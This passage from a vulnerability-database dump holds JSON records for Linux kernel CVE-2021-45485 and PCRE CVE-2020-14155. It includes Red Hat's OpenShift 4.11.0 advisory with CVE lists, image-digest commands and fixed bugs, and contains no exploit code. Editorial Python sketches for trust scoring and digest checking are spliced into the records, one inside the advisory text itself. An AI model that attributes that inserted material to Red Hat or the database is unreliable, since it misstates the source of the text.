"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3679"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42008"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38204"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
},
{
"db": "PACKETSTORM",
"id": "166101"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-409116",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-45485",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167602",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167072",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169695",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169997",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166101",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-45485",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-12-25T00:00:00",
"db": "VULHUB",
"id": "VHN-409116",
"ident": null
},
{
"date": "2021-12-25T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45485",
"ident": null
},
{
"date": "2022-06-28T15:20:26",
"db": "PACKETSTORM",
"id": "167602",
"ident": null
},
{
"date": "2022-06-29T20:27:02",
"db": "PACKETSTORM",
"id": "167622",
"ident": null
},
{
"date": "2022-05-11T16:37:26",
"db": "PACKETSTORM",
"id": "167072",
"ident": null
},
{
"date": "2022-05-31T17:24:53",
"db": "PACKETSTORM",
"id": "167330",
"ident": null
},
{
"date": "2022-11-02T15:01:20",
"db": "PACKETSTORM",
"id": "169695",
"ident": null
},
{
"date": "2022-11-23T15:18:44",
"db": "PACKETSTORM",
"id": "169997",
"ident": null
},
{
"date": "2022-02-22T17:06:12",
"db": "PACKETSTORM",
"id": "166101",
"ident": null
},
{
"date": "2021-12-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"ident": null
},
{
"date": "2023-01-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"ident": null
},
{
"date": "2021-12-25T02:15:06.667000",
"db": "NVD",
"id": "CVE-2021-45485",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-24T00:00:00",
"db": "VULHUB",
"id": "VHN-409116",
"ident": null
},
{
"date": "2023-02-24T00:00:00",
"db": "VULMON",
"id": "CVE-2021-45485",
"ident": null
},
{
"date": "2023-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"ident": null
},
{
"date": "2023-01-18T05:28:00",
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"ident": null
},
{
"date": "2024-11-21T06:32:18.733000",
"db": "NVD",
"id": "CVE-2021-45485",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Vulnerability in using cryptographic algorithms in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
}
],
"trust": 0.6
}
}
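Each contributing database in the record above carries a per-source "trust" weight (0.1 for NVD mirrors, 0.6 for CNNVD, 0.8 for JVNDB). As a minimal sketch of how such weights might be combined into an overall confidence score, here is an illustrative capped-sum rule; the function name and the capping rule are our assumptions, not VARIoT's actual aggregation algorithm:

```python
# Sketch: aggregate per-source "trust" weights from a VARIoT-style record.
# The capped-sum rule below is illustrative only, not the database's real logic.

def aggregate_trust(entries):
    """Sum the trust weights of all contributing sources, capped at 1.0."""
    total = sum(e.get("trust", 0.0) for e in entries)
    return min(total, 1.0)

# Two of the sources from the record above (weights as listed in the dump).
record_sources = [
    {"db": "CNNVD", "id": "CNNVD-202112-2265", "trust": 0.6},
    {"db": "JVNDB", "id": "JVNDB-2021-017434", "trust": 0.8},
]

print(aggregate_trust(record_sources))  # prints 1.0 (0.6 + 0.8, capped)
```

A missing "trust" key defaults to 0.0, so partially populated source entries do not raise.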
VAR-202006-0222
Vulnerability from variot - Updated: 2026-03-09 21:42
libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring. PCRE is an open source regular expression library, written in C by the software developer Philip Hazel. An input validation vulnerability exists in libpcre in versions prior to PCRE 8.44. An attacker able to supply such a pattern could exploit this vulnerability to execute arbitrary code on the system or cause the affected application to crash. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: OpenShift Container Platform 4.11.0 bug fix and security update
Advisory ID: RHSA-2022:5069-01
Product: Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2022:5069
Issue date: 2022-08-10
CVE Names: CVE-2018-25009 CVE-2018-25010 CVE-2018-25012 CVE-2018-25013
CVE-2018-25014 CVE-2018-25032 CVE-2019-5827 CVE-2019-13750
CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218
CVE-2019-19603 CVE-2019-20838 CVE-2020-13435 CVE-2020-14155
CVE-2020-17541 CVE-2020-19131 CVE-2020-24370 CVE-2020-28493
CVE-2020-35492 CVE-2020-36330 CVE-2020-36331 CVE-2020-36332
CVE-2021-3481 CVE-2021-3580 CVE-2021-3634 CVE-2021-3672
CVE-2021-3695 CVE-2021-3696 CVE-2021-3697 CVE-2021-3737
CVE-2021-4115 CVE-2021-4156 CVE-2021-4189 CVE-2021-20095
CVE-2021-20231 CVE-2021-20232 CVE-2021-23177 CVE-2021-23566
CVE-2021-23648 CVE-2021-25219 CVE-2021-31535 CVE-2021-31566
CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087
CVE-2021-38185 CVE-2021-38593 CVE-2021-40528 CVE-2021-41190
CVE-2021-41617 CVE-2021-42771 CVE-2021-43527 CVE-2021-43818
CVE-2021-44225 CVE-2021-44906 CVE-2022-0235 CVE-2022-0778
CVE-2022-1012 CVE-2022-1215 CVE-2022-1271 CVE-2022-1292
CVE-2022-1586 CVE-2022-1621 CVE-2022-1629 CVE-2022-1706
CVE-2022-1729 CVE-2022-2068 CVE-2022-2097 CVE-2022-21698
CVE-2022-22576 CVE-2022-23772 CVE-2022-23773 CVE-2022-23806
CVE-2022-24407 CVE-2022-24675 CVE-2022-24903 CVE-2022-24921
CVE-2022-25313 CVE-2022-25314 CVE-2022-26691 CVE-2022-26945
CVE-2022-27191 CVE-2022-27774 CVE-2022-27776 CVE-2022-27782
CVE-2022-28327 CVE-2022-28733 CVE-2022-28734 CVE-2022-28735
CVE-2022-28736 CVE-2022-28737 CVE-2022-29162 CVE-2022-29810
CVE-2022-29824 CVE-2022-30321 CVE-2022-30322 CVE-2022-30323
CVE-2022-32250
====================================================================

1. Summary:
Red Hat OpenShift Container Platform release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.11.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.0. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2022:5068
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
Security Fix(es):
- go-getter: command injection vulnerability (CVE-2022-26945)
- go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)
- go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)
- go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)
- nanoid: Information disclosure via valueOf() function (CVE-2021-23566)
- sanitize-url: XSS (CVE-2021-23648)
- minimist: prototype pollution (CVE-2021-44906)
- node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
- prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
- golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
- go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)
- opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-x86_64
The image digest is sha256:300bce8246cf880e792e106607925de0a404484637627edf5f517375517d54a4
(For aarch64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-aarch64
The image digest is sha256:29fa8419da2afdb64b5475d2b43dad8cc9205e566db3968c5738e7a91cf96dfe
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-s390x
The image digest is sha256:015d6180238b4024d11dfef6751143619a0458eccfb589f2058ceb1a6359dd46
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.11.0-ppc64le
The image digest is sha256:5052f8d5597c6656ca9b6bfd3de521504c79917aa80feb915d3c8546241f86ca
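When mirroring these release images, the digest reported by a registry can be compared against the pinned values above before trusting the content. A minimal sketch of that check follows; the helper name is ours for illustration and is not part of the oc tooling:

```python
import re

# Sketch: verify that a digest string reported by a registry matches the
# value pinned in the advisory. Helper name is illustrative, not an oc API.
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")

def digest_matches(reported, pinned):
    """Return True only if both strings are well-formed sha256 digests and equal."""
    if not (DIGEST_RE.match(reported) and DIGEST_RE.match(pinned)):
        raise ValueError("malformed digest")
    return reported == pinned

# Pinned digest for the x86_64 release image, copied from the advisory above.
pinned = "sha256:300bce8246cf880e792e106607925de0a404484637627edf5f517375517d54a4"
print(digest_matches(pinned, pinned))  # prints True
```

Rejecting malformed strings outright (rather than returning False) makes truncated or tag-style references fail loudly instead of silently comparing unequal.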
All OpenShift Container Platform 4.11 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1817075 - MCC & MCO don't free leader leases during shut down -> 10 minutes of leader election timeouts
1822752 - cluster-version operator stops applying manifests when blocked by a precondition check
1823143 - oc adm release extract --command, --tools doesn't pull from localregistry when given a localregistry/image
1858418 - [OCPonRHV] OpenShift installer fails when Blank template is missing in oVirt/RHV
1859153 - [AWS] An IAM error occurred occasionally during the installation phase: Invalid IAM Instance Profile name
1896181 - [ovirt] install fails: due to terraform error "Cannot run VM. VM is being updated" on vm resource
1898265 - [OCP 4.5][AWS] Installation failed: error updating LB Target Group
1902307 - [vSphere] cloud labels management via cloud provider makes nodes not ready
1905850 - oc adm policy who-can failed to check the operatorcondition/status resource
1916279 - [OCPonRHV] Sometimes terraform installation fails on -failed to fetch Cluster(another terraform bug)
1917898 - [ovirt] install fails: due to terraform error "Tag not matched: expect but got " on vm resource
1918005 - [vsphere] If there are multiple port groups with the same name installation fails
1918417 - IPv6 errors after exiting crictl
1918690 - Should update the KCM resource-graph timely with the latest configure
1919980 - oVirt installer fails due to terraform error "Failed to wait for Templte(...) to become ok"
1921182 - InspectFailed: kubelet Failed to inspect image: rpc error: code = DeadlineExceeded desc = context deadline exceeded
1923536 - Image pullthrough does not pass 429 errors back to capable clients
1926975 - [aws-c2s] kube-apiserver crashloops due to missing cloud config
1928932 - deploy/route_crd.yaml in openshift/router uses deprecated v1beta1 CRD API
1932812 - Installer uses the terraform-provider in the Installer's directory if it exists
1934304 - MemoryPressure Top Pod Consumers seems to be 2x expected value
1943937 - CatalogSource incorrect parsing validation
1944264 - [ovn] CNO should gracefully terminate OVN databases
1944851 - List of ingress routes not cleaned up when routers no longer exist - take 2
1945329 - In k8s 1.21 bump conntrack 'should drop INVALID conntrack entries' tests are disabled
1948556 - Cannot read property 'apiGroup' of undefined error viewing operator CSV
1949827 - Kubelet bound to incorrect IPs, referring to incorrect NICs in 4.5.x
1957012 - Deleting the KubeDescheduler CR does not remove the corresponding deployment or configmap
1957668 - oc login does not show link to console
1958198 - authentication operator takes too long to pick up a configuration change
1958512 - No 1.25 shown in REMOVEDINRELEASE for apis audited with k8s.io/removed-release 1.25 and k8s.io/deprecated true
1961233 - Add CI test coverage for DNS availability during upgrades
1961844 - baremetal ClusterOperator installed by CVO does not have relatedObjects
1965468 - [OSP] Delete volume snapshots based on cluster ID in their metadata
1965934 - can not get new result with "Refresh off" if click "Run queries" again
1965969 - [aws] the public hosted zone id is not correct in the destroy log, while destroying a cluster which is using BYO private hosted zone.
1968253 - GCP CSI driver can provision volume with access mode ROX
1969794 - [OSP] Document how to use image registry PVC backend with custom availability zones
1975543 - [OLM] Remove stale cruft installed by CVO in earlier releases
1976111 - [tracker] multipathd.socket is missing start conditions
1976782 - Openshift registry starts to segfault after S3 storage configuration
1977100 - Pod failed to start with message "set CPU load balancing: readdirent /proc/sys/kernel/sched_domain/cpu66/domain0: no such file or directory"
1978303 - KAS pod logs show: [SHOULD NOT HAPPEN] ...failed to convert new object...CertificateSigningRequest) to smd typed: .status.conditions: duplicate entries for key [type=\"Approved\"]
1978798 - [Network Operator] Upgrade: The configuration to enable network policy ACL logging is missing on the cluster upgraded from 4.7->4.8
1979671 - Warning annotation for pods with cpu requests or limits on single-node OpenShift cluster without workload partitioning
1982737 - OLM does not warn on invalid CSV
1983056 - IP conflict while recreating Pod with fixed name
1984785 - LSO CSV does not contain disconnected annotation
1989610 - Unsupported data types should not be rendered on operand details page
1990125 - co/image-registry is degrade because ImagePrunerDegraded: Job has reached the specified backoff limit
1990384 - 502 error on "Observe -> Alerting" UI after disabled local alertmanager
1992553 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1994117 - Some hardcodes are detected at the code level in orphaned code
1994820 - machine controller doesn't send vCPU quota failed messages to cluster install logs
1995953 - Ingresscontroller change the replicas to scaleup first time will be rolling update for all the ingress pods
1996544 - AWS region ap-northeast-3 is missing in installer prompt
1996638 - Helm operator manager container restart when CR is creating&deleting
1997120 - test_recreate_pod_in_namespace fails - Timed out waiting for namespace
1997142 - OperatorHub: Filtering the OperatorHub catalog is extremely slow
1997704 - [osp][octavia lb] given loadBalancerIP is ignored when creating a LoadBalancer type svc
1999325 - FailedMount MountVolume.SetUp failed for volume "kube-api-access" : object "openshift-kube-scheduler"/"kube-root-ca.crt" not registered
1999529 - Must gather fails to gather logs for all the namespace if server doesn't have volumesnapshotclasses resource
1999891 - must-gather collects backup data even when Pods fails to be created
2000653 - Add hypershift namespace to exclude namespaces list in descheduler configmap
2002009 - IPI Baremetal, qemu-convert takes to long to save image into drive on slow/large disks
2002602 - Storageclass creation page goes blank when "Enable encryption" is clicked if there is a syntax error in the configmap
2002868 - Node exporter not able to scrape OVS metrics
2005321 - Web Terminal is not opened on Stage of DevSandbox when terminal instance is not created yet
2005694 - Removing proxy object takes up to 10 minutes for the changes to propagate to the MCO
2006067 - Objects are not valid as a React child
2006201 - ovirt-csi-driver-node pods are crashing intermittently
2007246 - Openshift Container Platform - Ingress Controller does not set allowPrivilegeEscalation in the router deployment
2007340 - Accessibility issues on topology - list view
2007611 - TLS issues with the internal registry and AWS S3 bucket
2007647 - oc adm release info --changes-from does not show changes in repos that squash-merge
2008486 - Double scroll bar shows up on dragging the task quick search to the bottom
2009345 - Overview page does not load from openshift console for some set of users after upgrading to 4.7.19
2009352 - Add image-registry usage metrics to telemeter
2009845 - Respect overrides changes during installation
2010361 - OpenShift Alerting Rules Style-Guide Compliance
2010364 - OpenShift Alerting Rules Style-Guide Compliance
2010393 - [sig-arch][Late] clients should not use APIs that are removed in upcoming releases [Suite:openshift/conformance/parallel]
2011525 - Rate-limit incoming BFD to prevent ovn-controller DoS
2011895 - Details about cloud errors are missing from PV/PVC errors
2012111 - LSO still try to find localvolumeset which is already deleted
2012969 - need to figure out why osupdatedstart to reboot is zero seconds
2013144 - Developer catalog category links could not be open in a new tab (sharing and open a deep link works fine)
2013461 - Import deployment from Git with s2i expose always port 8080 (Service and Pod template, not Route) if another Route port is selected by the user
2013734 - unable to label downloads route in openshift-console namespace
2013822 - ensure that the container-tools content comes from the RHAOS plashets
2014161 - PipelineRun logs are delayed and stuck on a high log volume
2014240 - Image registry uses ICSPs only when source exactly matches image
2014420 - Topology page is crashed
2014640 - Cannot change storage class of boot disk when cloning from template
2015023 - Operator objects are re-created even after deleting it
2015042 - Adding a template from the catalog creates a secret that is not owned by the TemplateInstance
2015356 - Different status shows on VM list page and details page
2015375 - PVC creation for ODF/IBM Flashsystem shows incorrect types
2015459 - [azure][openstack]When image registry configure an invalid proxy, registry pods are CrashLoopBackOff
2015800 - [IBM]Shouldn't change status.storage.bucket and status.storage.resourceKeyCRN when update sepc.stroage,ibmcos with invalid value
2016425 - Adoption controller generating invalid metadata.Labels for an already adopted Subscription resource
2016534 - externalIP does not work when egressIP is also present
2017001 - Topology context menu for Serverless components always open downwards
2018188 - VRRP ID conflict between keepalived-ipfailover and cluster VIPs
2018517 - [sig-arch] events should not repeat pathologically expand_less failures - s390x CI
2019532 - Logger object in LSO does not log source location accurately
2019564 - User settings resources (ConfigMap, Role, RB) should be deleted when a user is deleted
2020483 - Parameter $auto_interval_period is in Period drop-down list
2020622 - e2e-aws-upi and e2e-azure-upi jobs are not working
2021041 - [vsphere] Not found TagCategory when destroying ipi cluster
2021446 - openshift-ingress-canary is not reporting DEGRADED state, even though the canary route is not available and accessible
2022253 - Web terminal view is broken
2022507 - Pods stuck in OutOfpods state after running cluster-density
2022611 - Remove BlockPools(no use case) and Object(redundat with Overview) tab on the storagesystem page for NooBaa only and remove BlockPools tab for External mode deployment
2022745 - Cluster reader is not able to list NodeNetwork objects
2023295 - Must-gather tool gathering data from custom namespaces.
2023691 - ClusterIP internalTrafficPolicy does not work for ovn-kubernetes
2024427 - oc completion zsh doesn't auto complete
2024708 - The form for creating operational CRs is badly rendering filed names ("obsoleteCPUs" -> "Obsolete CP Us" )
2024821 - [Azure-File-CSI] need more clear info when requesting pvc with volumeMode Block
2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion
2025624 - Ingress router metrics endpoint serving old certificates after certificate rotation
2026356 - [IPI on Azure] The bootstrap machine type should be same as master
2026461 - Completed pods in Openshift cluster not releasing IP addresses and results in err: range is full unless manually deleted
2027603 - [UI] Dropdown doesn't close on it's own after arbiter zone selection on 'Capacity and nodes' page
2027613 - Users can't silence alerts from the dev console
2028493 - OVN-migration failed - ovnkube-node: error waiting for node readiness: timed out waiting for the condition
2028532 - noobaa-pg-db-0 pod stuck in Init:0/2
2028821 - Misspelled label in ODF management UI - MCG performance view
2029438 - Bootstrap node cannot resolve api-int because NetworkManager replaces resolv.conf
2029470 - Recover from suddenly appearing old operand revision WAS: kube-scheduler-operator test failure: Node's not achieving new revision
2029797 - Uncaught exception: ResizeObserver loop limit exceeded
2029835 - CSI migration for vSphere: Inline-volume tests failing
2030034 - prometheusrules.openshift.io: dial tcp: lookup prometheus-operator.openshift-monitoring.svc on 172.30.0.10:53: no such host
2030530 - VM created via customize wizard has single quotation marks surrounding its password
2030733 - wrong IP selected to connect to the nodes when ExternalCloudProvider enabled
2030776 - e2e-operator always uses quay master images during presubmit tests
2032559 - CNO allows migration to dual-stack in unsupported configurations
2032717 - Unable to download ignition after coreos-installer install --copy-network
2032924 - PVs are not being cleaned up after PVC deletion
2033482 - [vsphere] two variables in tf are undeclared and get warning message during installation
2033575 - monitoring targets are down after the cluster run for more than 1 day
2033711 - IBM VPC operator needs e2e csi tests for ibmcloud
2033862 - MachineSet is not scaling up due to an OpenStack error trying to create multiple ports with the same MAC address
2034147 - OpenShift VMware IPI Installation fails with Resource customization when corespersocket is unset and vCPU count is not a multiple of 4
2034296 - Kubelet and Crio fails to start during upgrde to 4.7.37
2034411 - [Egress Router] No NAT rules for ipv6 source and destination created in ip6tables-save
2034688 - Allow Prometheus/Thanos to return 401 or 403 when the request isn't authenticated
2034958 - [sig-network] Conntrack should be able to preserve UDP traffic when initial unready endpoints get ready
2035005 - MCD is not always removing in progress taint after a successful update
2035334 - [RFE] [OCPonRHV] Provision machines with preallocated disks
2035899 - Operator-sdk run bundle doesn't support arm64 env
2036202 - Bump podman to >= 3.3.0 so that setup of multiple credentials for a single registry which can be distinguished by their path will work
2036594 - [MAPO] Machine goes to failed state due to a momentary error of the cluster etcd
2036948 - SR-IOV Network Device Plugin should handle offloaded VF instead of supporting only PF
2037190 - dns operator status flaps between True/False/False and True/True/(False|True) after updating dnses.operator.openshift.io/default
2037447 - Ingress Operator is not closing TCP connections.
2037513 - I/O metrics from the Kubernetes/Compute Resources/Cluster Dashboard show as no datapoints found
2037542 - Pipeline Builder footer is not sticky and yaml tab doesn't use full height
2037610 - typo for the Terminated message from thanos-querier pod description info
2037620 - Upgrade playbook should quit directly when trying to upgrade RHEL-7 workers to 4.10
2037625 - AppliedClusterResourceQuotas can not be shown on project overview
2037626 - unable to fetch ignition file when scaleup rhel worker nodes on cluster enabled Tang disk encryption
2037628 - Add test id to kms flows for automation
2037721 - PodDisruptionBudgetAtLimit alert fired in SNO cluster
2037762 - Wrong ServiceMonitor definition is causing failure during Prometheus configuration reload and preventing changes from being applied
2037841 - [RFE] use /dev/ptp_hyperv on Azure/AzureStack
2038115 - Namespace and application bar is not sticky anymore
2038244 - Import from git ignore the given servername and could not validate On-Premises GitHub and BitBucket installations
2038405 - openshift-e2e-aws-workers-rhel-workflow in CI step registry broken
2038774 - IBM-Cloud OVN IPsec fails, IKE UDP ports and ESP protocol not in security group
2039135 - the error message is not clear when using "opm index prune" to prune a file-based index image
2039161 - Note about token for encrypted PVCs should be removed when only cluster wide encryption checkbox is selected
2039253 - ovnkube-node crashes on duplicate endpoints
2039256 - Domain validation fails when TLD contains a digit.
2039277 - Topology list view items are not highlighted on keyboard navigation
2039462 - Application tab in User Preferences dropdown menus are too wide.
2039477 - validation icon is missing from Import from git
2039589 - The toolbox command always ignores [command] the first time
2039647 - Some developer perspective links are not deep-linked causes developer to sometimes delete/modify resources in the wrong project
2040180 - Bug when adding a new table panel to a dashboard for OCP UI with only one value column
2040195 - Ignition fails to enable systemd units with backslash-escaped characters in their names
2040277 - ThanosRuleNoEvaluationFor10Intervals alert description is wrong
2040488 - OpenShift-Ansible BYOH Unit Tests are Broken
2040635 - CPU Utilisation is negative number for "Kubernetes / Compute Resources / Cluster" dashboard
2040654 - 'oc adm must-gather -- some_script' should exit with same non-zero code as the failed 'some_script' exits
2040779 - Nodeport svc not accessible when the backend pod is on a window node
2040933 - OCP 4.10 nightly build will fail to install if multiple NICs are defined on KVM nodes
2041133 - 'oc explain route.status.ingress.conditions' shows type 'Currently only Ready' but actually is 'Admitted'
2041454 - Garbage values accepted for --reference-policy in oc import-image without any error
2041616 - Ingress operator tries to manage DNS of additional ingresscontrollers that are not under clusters basedomain, which can't work
2041769 - Pipeline Metrics page not showing data for normal user
2041774 - Failing git detection should not recommend Devfiles as import strategy
2041814 - The KubeletConfigController wrongly process multiple confs for a pool
2041940 - Namespace pre-population not happening till a Pod is created
2042027 - Incorrect feedback for "oc label pods --all"
2042348 - Volume ID is missing in output message when expanding volume which is not mounted.
2042446 - CSIWithOldVSphereHWVersion alert recurring despite upgrade to vmx-15
2042501 - use lease for leader election
2042587 - ocm-operator: Improve reconciliation of CA ConfigMaps
2042652 - Unable to deploy hw-event-proxy operator
2042838 - The status of container is not consistent on Container details and pod details page
2042852 - Topology toolbars are unaligned to other toolbars
2042999 - A pod cannot reach kubernetes.default.svc.cluster.local cluster IP
2043035 - Wrong error code provided when request contains invalid argument
2043068 - available of text disappears in Utilization item if x is 0
2043080 - openshift-installer intermittent failure on AWS with Error: InvalidVpcID.NotFound: The vpc ID 'vpc-123456789' does not exist
2043094 - ovnkube-node not deleting stale conntrack entries when endpoints go away
2043118 - Host should transition through Preparing when HostFirmwareSettings changed
2043132 - Add a metric when vsphere csi storageclass creation fails
2043314 - oc debug node does not meet compliance requirement
2043336 - Creating multi SriovNetworkNodePolicy cause the worker always be draining
2043428 - Address Alibaba CSI driver operator review comments
2043533 - Update ironic, inspector, and ironic-python-agent to latest bugfix release
2043672 - [MAPO] root volumes not working
2044140 - When 'oc adm upgrade --to-image ...' rejects an update as not recommended, it should mention --allow-explicit-upgrade
2044207 - [KMS] The data in the text box does not get cleared on switching the authentication method
2044227 - Test Managed cluster should only include cluster daemonsets that have maxUnavailable update of 10 or 33 percent fails
2044412 - Topology list misses separator lines and hover effect let the list jump 1px
2044421 - Topology list does not allow selecting an application group anymore
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor
2044803 - Unify button text style on VM tabs
2044824 - Failing test in periodics: [sig-network] Services should respect internalTrafficPolicy=Local Pod and Node, to Pod (hostNetwork: true) [Feature:ServiceInternalTrafficPolicy] [Skipped:Network/OVNKubernetes] [Suite:openshift/conformance/parallel] [Suite:k8s]
2045065 - Scheduled pod has nodeName changed
2045073 - Bump golang and build images for local-storage-operator
2045087 - Failed to apply sriov policy on intel nics
2045551 - Remove enabled FeatureGates from TechPreviewNoUpgrade
2045559 - API_VIP moved when kube-api container on another master node was stopped
2045577 - [ocp 4.9 | ovn-kubernetes] ovsdb_idl|WARN|transaction error: {"details":"cannot delete Datapath_Binding row 29e48972-xxxx because of 2 remaining reference(s)","error":"referential integrity violation
2045872 - SNO: cluster-policy-controller failed to start due to missing serving-cert/tls.crt
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter
2046133 - [MAPO]IPI proxy installation failed
2046156 - Network policy: preview of affected pods for non-admin shows empty popup
2046157 - Still uses pod-security.admission.config.k8s.io/v1alpha1 in admission plugin config
2046191 - Opeartor pod is missing correct qosClass and priorityClass
2046277 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the module.vpc.aws_subnet.private_subnet[0] resource
2046319 - oc debug cronjob command failed with error "unable to extract pod template from type v1.CronJob".
2046435 - Better Devfile Import Strategy support in the 'Import from Git' flow
2046496 - Awkward wrapping of project toolbar on mobile
2046497 - Re-enable TestMetricsEndpoint test case in console operator e2e tests
2046498 - "All Projects" and "all applications" use different casing on topology page
2046591 - Auto-update boot source is not available while create new template from it
2046594 - "Requested template could not be found" while creating VM from user-created template
2046598 - Auto-update boot source size unit is byte on customize wizard
2046601 - Cannot create VM from template
2046618 - Start last run action should contain current user name in the started-by annotation of the PLR
2046662 - Should upgrade the go version to be 1.17 for example go operator memcached-operator
2047197 - Sould upgrade the operator_sdk.util version to "0.4.0" for the "osdk_metric" module
2047257 - [CP MIGRATION] Node drain failure during control plane node migration
2047277 - Storage status is missing from status card of virtualization overview
2047308 - Remove metrics and events for master port offsets
2047310 - Running VMs per template card needs empty state when no VMs exist
2047320 - New route annotation to show another URL or hide topology URL decorator doesn't work for Knative Services
2047335 - 'oc get project' caused 'Observed a panic: cannot deep copy core.NamespacePhase' when AllRequestBodies is used
2047362 - Removing prometheus UI access breaks origin test
2047445 - ovs-configure mis-detecting the ipv6 status on IPv4 only cluster causing Deployment failure
2047670 - Installer should pre-check that the hosted zone is not associated with the VPC and throw the error message.
